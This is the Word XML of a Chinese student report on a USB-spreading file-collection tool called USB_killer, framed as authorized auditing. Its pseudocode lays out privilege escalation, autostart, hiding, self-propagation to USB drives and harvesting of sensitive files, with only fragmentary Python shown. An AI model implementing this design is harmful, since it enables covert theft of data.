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D46FC7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>U盘偷猎及其防御的研究</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6537F7">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:vertAlign w:val="baseline"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:vertAlign w:val="baseline"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>指导老师：沈梦佳</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B10ECA5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C3D71A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>项目名称：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>USB_killer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>项目编号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USB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>2025-PY01</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>开发周期：2025.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>.10-2025.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>31</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>开发团队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李宁后援团</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCF4960">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CDA203A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BF58500">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26164179">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default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179E3AF">
      <w:pPr>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>一、USB Killer 程序开发目的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A49A77A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核心目标：开发一个自动化数据采集工具，用于在授权环境下执行合规的敏感信息监控和备</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="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份操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8B9E91"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 w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>具体用途：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C81250">
      <w:pPr>
        <w:ind w:left="420" w:hanging="420" w:hangingChars="20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​</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>合规审计：协助企业IT部门在授权设备上监控和备份包含敏感关键词的文件，满足内部审计要求</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AFCB40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​</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>数据防泄露：在授权范围内自动备份含有"机密"、"财务"等关键词的重要文档，防止意</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="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外数据丢失</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B83825B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​</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>安全研究：作为红队演练工具，测试企业防数据泄露系统的有效性（需明确授权）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1EADB9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​</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>应急响应：在获得合法授权的情况下，快速收集特定设备上的关键业务数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EB610E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>技术特点：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714A82C9"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采用隐蔽运行设计，避免干扰正常办公</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD643A3"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实现自动化U盘检测和文件过滤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018720D3"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支持双向同步机制（标准采集/管理员回收）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121A8604"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包含完整性校验和加密存储功能</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E421CB0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>适用场景：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073475B4"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√ 经员工书面同意的企业设备监控</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D4EBAC"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√ 有明确授权协议的合规审计</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E7C7DB"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√ 安全团队授权的防泄露演练</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334E8572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b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>注意事项：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536ECC52">
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>× 严禁在未经授权的情况下使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8248C0">
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>× 不得违反当地数据隐私法规</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25ADC77D">
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>× 程序使用需配合完整的授权记录和审计日志</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCC81EC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>本程序为技术演示用途，实际部署需配套完整的法律合规审查流程和书面授权机制。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5365C154">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F74205C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42213789">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>摘要</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A87705B"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伪代码展示：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="871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61"/>
        <w:gridCol w:w="8358"/>
      </w:tblGrid>
      <w:tr w14:paraId="0B28B5E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4" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="361" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:color="6CE26C" w:sz="8" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
            <w:tcMar>
              <w:right w:w="38" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="71AEBEE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01</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70A4D02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02</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="707CB39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03</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19A9FFE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04</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BB1743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05</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33396B2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06</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35D6004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07</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5676B1B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08</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="625526A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09</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D1FA66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10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53DB6AC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11</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68B6D8C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12</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A6BAF9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13</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07D8849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14</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E74413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15</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C7ECA5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16</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1317402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17</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="728EBD1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18</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52C845C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19</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36DB8DE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20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="430D2B4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21</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41C9F1E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22</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F50A46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23</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B918C4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24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="83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75" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="2351114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程序启动:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E64ECA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IF 非管理员 THEN 提权并退出</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68F29F7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初始化目录和加密令牌</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B929CA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设置自启动</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AAFE55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复制自身到隐藏目录</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="760139F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  <w:p w14:paraId="7801FD6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主循环:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B36DF1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 xml:space="preserve">WHILE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True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:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57E829B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sleep(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3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)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AB5922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 xml:space="preserve">新U盘列表 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获取当前U盘</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65449FA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  <w:p w14:paraId="7E3E182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8200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# 处理新U盘</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F7AE0C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 xml:space="preserve">FOR U盘 IN (新U盘列表 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当前U盘列表):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="737B4A5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记录日志(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"发现新U盘"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)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="687B686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IF 是管理员U盘:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42736D6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反向同步文件</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75A3A76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ELSE:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5601335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传播自身并扫描敏感文件</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61B1A10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  <w:p w14:paraId="237BC72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8200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# 记录移除的U盘</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06FAC47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 xml:space="preserve">FOR U盘 IN (当前U盘列表 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新U盘列表):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2555307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记录日志(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"U盘移除"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)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09D9864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  <w:p w14:paraId="05F3C4C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 xml:space="preserve">当前U盘列表 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新U盘列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="507742C5">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2119A126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技术细节&amp;核心功能实现：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135FDF17">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:outlineLvl w:val="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初始化模块</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D60CC83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get_target_dir()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29269456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采用三级回退路径策略：D盘 → AppData → 临时目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EED96C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使用os.access()验证写入权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E14C448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自动处理路径分隔符兼容性问题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DB906F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核心功能：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="851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14"/>
        <w:gridCol w:w="7905"/>
      </w:tblGrid>
      <w:tr w14:paraId="1A1F82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12" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="614" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:color="6CE26C" w:sz="8" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
            <w:tcMar>
              <w:right w:w="38" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="0CF6CEC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  <w:p w14:paraId="0BD859B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2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A50A74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3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A2CB6D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4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7348472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5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4629501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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="79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75" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="6C03FB1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20"/>
                <w:szCs w:val="20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 xml:space="preserve">paths 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[</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55F7828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20"/>
                <w:szCs w:val="20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'D:\\usb_killer\\'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 xml:space="preserve">, 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8200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# 首选</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="395F57F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20"/>
                <w:szCs w:val="20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os.path.join(os.environ[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'APPDATA'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 xml:space="preserve">],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'usb_killer\\'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 xml:space="preserve">), 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8200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# 次选</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B88DF3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20"/>
                <w:szCs w:val="20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 xml:space="preserve">os.path.join(tempfile.gettempdir(),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'usb_killer\\'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 xml:space="preserve">) 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8200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# 保底</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32DC4C4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20"/>
                <w:szCs w:val="20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]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5232E0D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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pP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next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 xml:space="preserve">(p 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 xml:space="preserve">p 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 xml:space="preserve">paths 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os.access(os.path.dirname(p), os.W_OK))</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="71EE292F">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>2. 加密模块 (CryptoUtils)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED989CD">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>get_cipher()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F3AEDB">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>技术细节：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E567915">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4470D253"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采用Fernet对称加密算法（AES-128-CBC）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD83E63"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密钥持久化存储于crypto.key文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9237EE"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实现单例模式避免重复生成密钥</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06459DDB">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>核心功能：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="853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16"/>
        <w:gridCol w:w="7923"/>
      </w:tblGrid>
      <w:tr w14:paraId="2F7D842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78" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="616" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:color="6CE26C" w:sz="8" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
            <w:tcMar>
              <w:right w:w="38" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="3021886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2"/>
                <w:szCs w:val="22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  <w:p w14:paraId="40E867C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2"/>
                <w:szCs w:val="22"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="614FA9D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2"/>
                <w:szCs w:val="22"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FDF88C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2"/>
                <w:szCs w:val="22"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0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79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75" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="0FD833A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22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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22"/>
                <w:szCs w:val="22"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
                <w:vertAlign w:val="baselin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22"/>
                <w:szCs w:val="22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22"/>
                <w:szCs w:val="22"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>not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22"/>
                <w:szCs w:val="22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vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>os.path.exists(key_path):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5732431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22"/>
                <w:szCs w:val="22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22"/>
                <w:szCs w:val="22"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
                <w:vertAlign w:val="baseline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vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">with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22"/>
                <w:szCs w:val="22"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
